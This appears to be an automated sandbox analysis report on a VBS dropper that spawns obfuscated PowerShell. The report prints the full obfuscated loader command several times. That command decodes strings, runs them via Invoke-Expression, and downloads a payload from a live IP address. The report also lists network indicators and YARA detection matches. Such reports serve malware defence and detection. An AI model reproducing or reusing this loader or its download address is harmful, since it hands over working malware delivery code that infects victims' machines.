risLudlgg:Unen pF gler ialti ttacsP nnikridicrExcitIJejunGFastlEbr gnNSymbre ars=Metap$ V lsbIllu,RAt mdIConfegBekengrepresLukrek Sd,k1Jydep1Balne6kryst. Fop SPigwaPWilcoL Ch liGtesktPriso(Ligh.$UknneAPolelfAfbetTMeropGMe.ogtConvesStamky cornDBrushe SerilPunktSDappeEAfgnarCockn)');Desiodothyroxine3 (Centralkomites $Personnummers);$Briggsk116=$Priskrigene[0];$Skaberkrfters=(Centralkomites 'Nimme$.tandGBou.hlErob,oTasseb ExcrAdigtelAssy.:Cre cA rideQ .vlsuVindaa SkribGe.neERadio

          Suricata Signatures

          No Suricata rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Joe Sandbox ML detected suspicious sample
          Source: Submited SampleNeural Call Log Analysis: 98.7%
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2565274087.0000000006DCE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: m.Core.pdb5 source: powershell.exe, 00000008.00000002.2572137053.0000000007D28000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: .Core.pdb source: powershell.exe, 00000008.00000002.2572137053.0000000007D28000.00000004.00000020.00020000.00000000.sdmp

          Software Vulnerabilities

          barindex
          Suspicious execution chain found
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: global trafficHTTP traffic detected: GET /JD/Gossipers.toc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: 68.168.223.108Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: unknownTCP traffic detected without corresponding DNS query: 68.168.223.108
          Source: global trafficHTTP traffic detected: GET /JD/Gossipers.toc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: 68.168.223.108Connection: Keep-Alive
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.1
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.16
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.2
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.22
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.1
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.10
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A5700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/J
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/G
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Go
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gos
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Goss
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossi
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossip
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossipe
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossiper
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossipers
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossipers.
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossipers.t
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossipers.to
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossipers.toc
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossipers.tocP
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.223.108/JD/Gossipers.tocXR
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A5700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.168.H
          Source: wscript.exe, 00000000.00000003.1265664478.000001D5A7A44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1260517825.000001D5A7A44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1272116245.000001D5A5B7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1262046725.000001D5A7A44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1273952548.000001D5A5BB4000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: wscript.exe, 00000000.00000003.1265664478.000001D5A7A3B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1262046725.000001D5A7A13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?6f4070b188b28
          Source: wscript.exe, 00000000.00000003.1272116245.000001D5A5B7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1273952548.000001D5A5BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabj
          Source: wscript.exe, 00000000.00000003.1272116245.000001D5A5B7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1273952548.000001D5A5BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/env
          Source: wscript.exe, 00000000.00000003.1266618163.000001D5A7A10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1262500209.000001D5A79E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?6f4070b188
          Source: powershell.exe, 00000005.00000002.1394333131.000001D1B4995000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2557671310.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A4921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2541328902.0000000004381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000005.00000002.1403411874.000001D1BD0B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A4921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000008.00000002.2541328902.0000000004381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 00000008.00000002.2557671310.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000008.00000002.2557671310.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000008.00000002.2557671310.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000005.00000002.1394333131.000001D1B4995000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2557671310.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: amsi32_1040.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 8104, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 1040, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Potential malicious VBS script found (suspicious strings)
          Source: Initial file: Growler=Udvisket.ShellExecute(Afmeld,Alumbrado(odonates) & Nonpunitory & Alumbrado(odonates),"","",0)
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});ConvertTo-Html;(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});ConvertTo-Html;$Protozoal=Centralkomites 'UdhunNAandseH lvfTKnowi.Sygehw';$Protozoal+=Centralkomites 'Tra.pe Ng eBGee.scStannl espIWeekeESkrumNOve,ft';$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';$Personnummers='Natur[ Mor.NPaa eEMondoTEll c.AudiosSuperEDirkeRTilkmvKorreiAl efcPyramEBrrespApproOAssorIu visNWhi ktIntegm per aGrievn ddanAfortrGFremhEFren rSoutf]Hellb: Hove: ensesEngulER.novcS wdeU PostrAcadeIElytrTAvedrySoejlpPardyRCodeboBassiTDeteko Fermc Utm.Ou derl Un,e=Gener$UnencHUdkraU ponsmAbeskpCheaps';$Affaldsbehandlingssystem+=Centralkomites 'Re.ym5 Me e. Re a0Civil Basha(,idsnWFjorti umlinA prodKilesoM.gilwIllegsGonad ParaNFaculTR sle B try1 Tita0 Neut.Restr0Umora;Disv Wan lWStimuiHjertnUnte 6Medbo4Mudst;Udsty Keciax bill6 ava4wicki;Lagri hawmrHunchvCbest:ifrer1ingse3Nasio4S,ema.udla 0Tabli)unalc RevolGFaaf eEquipcQuin,kSphaeo Gru / Cram2 Husa0 U.ya1 Week0T old0Herm.1Blast0Milli1Therm FortjFDuffaiLbeilrEberteHarmlf,sychoTrigoxchemo/Bihen1Ba.al3Fo pa4binar. etst0';$Transculturation=Centralkomites 'Skinnu SkilSUningeFo.terLavem-c eatATrochG nrulE EkstnUdartT';$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1 arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalGJ ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam ryoWeakmc';$Aftgtsydelser=Centralkomites ' pist>';$Likrer=Centralkomites 'RykkeiIsthmEPermix';$Hyposynergia='Sprngningsekspertens';$Konsigneres='\Discoach.Imm';Desiodothyroxine3 (Centralkomites '.loms$ UpsogHimmeL GushOVand,bLabioABriseLReinf: Ove A Buskf.orgeg SeldIS,rivVAcr tEDoodaLGyp ySRu,ddEEu,ognInsorS Penu=Endoc$Spen,EPol tN BlomVScumm: BordA .bysPQuinapAfskrdBlamia InfiTLitmua Brod+Donat$PrintKDu.niofr naNFishlsBegorIUm.rsgPicklnAsthoeTagdkrHjspneTube S');Desiodothyroxine3 (Centralkomites 'tho k$ AdstGSemiblB,folODactyBFassaAK risLudlgg:Unen pF gler ialti ttacsP nnikridicrExcitIJejunGFastlEbr gnNSymbre ars=Metap$ V lsbIllu,RAt mdIConfegBekengrepresLukrek Sd,k1Jydep1Balne6kryst. Fop SPigwaPWilcoL Ch liGtesktPriso(Ligh.$UknneAPolelfAfbetTMeropGMe.ogtConvesStamky cornDBrushe SerilPunktSDappeEAfgnarCockn)');Desiodothyroxine3 (Centralkomites $Personnummers);$Briggsk116=$Priskrigene[0];$Skaberkrfters=(Centralkomites 'Nimme$.tandGBou.hlErob,oTasseb ExcrAdigt
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});ConvertTo-Html;(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});ConvertTo-Html;$Protozoal=Centralkomites 'UdhunNAandseH lvfTKnowi.Sygehw';$Protozoal+=Centralkomites 'Tra.pe Ng eBGee.scStannl espIWeekeESkrumNOve,ft';$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';$Personnummers='Natur[ Mor.NPaa eEMondoTEll c.AudiosSuperEDirkeRTilkmvKorreiAl efcPyramEBrrespApproOAssorIu visNWhi ktIntegm per aGrievn ddanAfortrGFremhEFren rSoutf]Hellb: Hove: ensesEngulER.novcS wdeU PostrAcadeIElytrTAvedrySoejlpPardyRCodeboBassiTDeteko Fermc Utm.Ou derl Un,e=Gener$UnencHUdkraU ponsmAbeskpCheaps';$Affaldsbehandlingssystem+=Centralkomites 'Re.ym5 Me e. Re a0Civil Basha(,idsnWFjorti umlinA prodKilesoM.gilwIllegsGonad ParaNFaculTR sle B try1 Tita0 Neut.Restr0Umora;Disv Wan lWStimuiHjertnUnte 6Medbo4Mudst;Udsty Keciax bill6 ava4wicki;Lagri hawmrHunchvCbest:ifrer1ingse3Nasio4S,ema.udla 0Tabli)unalc RevolGFaaf eEquipcQuin,kSphaeo Gru / Cram2 Husa0 U.ya1 Week0T old0Herm.1Blast0Milli1Therm FortjFDuffaiLbeilrEberteHarmlf,sychoTrigoxchemo/Bihen1Ba.al3Fo pa4binar. etst0';$Transculturation=Centralkomites 'Skinnu SkilSUningeFo.terLavem-c eatATrochG nrulE EkstnUdartT';$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1 arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalGJ ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam ryoWeakmc';$Aftgtsydelser=Centralkomites ' pist>';$Likrer=Centralkomites 'RykkeiIsthmEPermix';$Hyposynergia='Sprngningsekspertens';$Konsigneres='\Discoach.Imm';Desiodothyroxine3 (Centralkomites '.loms$ UpsogHimmeL GushOVand,bLabioABriseLReinf: Ove A Buskf.orgeg SeldIS,rivVAcr tEDoodaLGyp ySRu,ddEEu,ognInsorS Penu=Endoc$Spen,EPol tN BlomVScumm: BordA .bysPQuinapAfskrdBlamia InfiTLitmua Brod+Donat$PrintKDu.niofr naNFishlsBegorIUm.rsgPicklnAsthoeTagdkrHjspneTube S');Desiodothyroxine3 (Centralkomites 'tho k$ AdstGSemiblB,folODactyBFassaAK risLudlgg:Unen pF gler ialti ttacsP nnikridicrExcitIJejunGFastlEbr gnNSymbre ars=Metap$ V lsbIllu,RAt mdIConfegBekengrepresLukrek Sd,k1Jydep1Balne6kryst. Fop SPigwaPWilcoL Ch liGtesktPriso(Ligh.$UknneAPolelfAfbetTMeropGMe.ogtConvesStamky cornDBrushe SerilPunktSDappeEAfgnarCockn)');Desiodothyroxine3 (Centralkomites $Personnummers);$Briggsk116=$Priskrigene[0];$Skaberkrfters=(Centralkomites 'Nimme$.tandGBou.hlErob,oTasseb ExcrAdigtJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
          Source: Agterdelen.vbsInitial sample: Strings found which are bigger than 50
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7296
          Source: unknownProcess created: Commandline size = 7296
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7296Jump to behavior
          Source: amsi32_1040.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 8104, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 1040, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal96.troj.expl.evad.winVBS@6/9@0/1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Discoach.ImmJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4436:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gx1ophtj.ezb.ps1Jump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Agterdelen.vbs"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8104
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1040
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Agterdelen.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});ConvertTo-Html;(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});ConvertTo-Html;$Protozoal=Centralkomites 'UdhunNAandseH lvfTKnowi.Sygehw';$Protozoal+=Centralkomites 'Tra.pe Ng eBGee.scStannl espIWeekeESkrumNOve,ft';$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';$Personnummers='Natur[ Mor.NPaa eEMondoTEll c.AudiosSuperEDirkeRTilkmvKorreiAl efcPyramEBrrespApproOAssorIu visNWhi ktIntegm per aGrievn ddanAfortrGFremhEFren rSoutf]Hellb: Hove: ensesEngulER.novcS wdeU PostrAcadeIElytrTAvedrySoejlpPardyRCodeboBassiTDeteko Fermc Utm.Ou derl Un,e=Gener$UnencHUdkraU ponsmAbeskpCheaps';$Affaldsbehandlingssystem+=Centralkomites 'Re.ym5 Me e. Re a0Civil Basha(,idsnWFjorti umlinA prodKilesoM.gilwIllegsGonad ParaNFaculTR sle B try1 Tita0 Neut.Restr0Umora;Disv Wan lWStimuiHjertnUnte 6Medbo4Mudst;Udsty Keciax bill6 ava4wicki;Lagri hawmrHunchvCbest:ifrer1ingse3Nasio4S,ema.udla 0Tabli)unalc RevolGFaaf eEquipcQuin,kSphaeo Gru / Cram2 Husa0 U.ya1 Week0T old0Herm.1Blast0Milli1Therm FortjFDuffaiLbeilrEberteHarmlf,sychoTrigoxchemo/Bihen1Ba.al3Fo pa4binar. etst0';$Transculturation=Centralkomites 'Skinnu SkilSUningeFo.terLavem-c eatATrochG nrulE EkstnUdartT';$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1 arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalGJ ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam ryoWeakmc';$Aftgtsydelser=Centralkomites ' pist>';$Likrer=Centralkomites 'RykkeiIsthmEPermix';$Hyposynergia='Sprngningsekspertens';$Konsigneres='\Discoach.Imm';Desiodothyroxine3 (Centralkomites '.loms$ UpsogHimmeL GushOVand,bLabioABriseLReinf: Ove A Buskf.orgeg SeldIS,rivVAcr tEDoodaLGyp ySRu,ddEEu,ognInsorS Penu=Endoc$Spen,EPol tN BlomVScumm: BordA .bysPQuinapAfskrdBlamia InfiTLitmua Brod+Donat$PrintKDu.niofr naNFishlsBegorIUm.rsgPicklnAsthoeTagdkrHjspneTube S');Desiodothyroxine3 (Centralkomites 'tho k$ AdstGSemiblB,folODactyBFassaAK risLudlgg:Unen pF gler ialti ttacsP nnikridicrExcitIJejunGFastlEbr gnNSymbre ars=Metap$ V lsbIllu,RAt mdIConfegBekengrepresLukrek Sd,k1Jydep1Balne6kryst. Fop SPigwaPWilcoL Ch liGtesktPriso(Ligh.$UknneAPolelfAfbetTMeropGMe.ogtConvesStamky cornDBrushe SerilPunktSDappeEAfgnarCockn)');Desiodothyroxine3 (Centralkomites $Personnummers);$Briggsk116=$Priskrigene[0];$Skaberkrfters=(Centralkomites 'Nimme$.tandGBou.hlErob,oTasseb ExcrAdigt
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
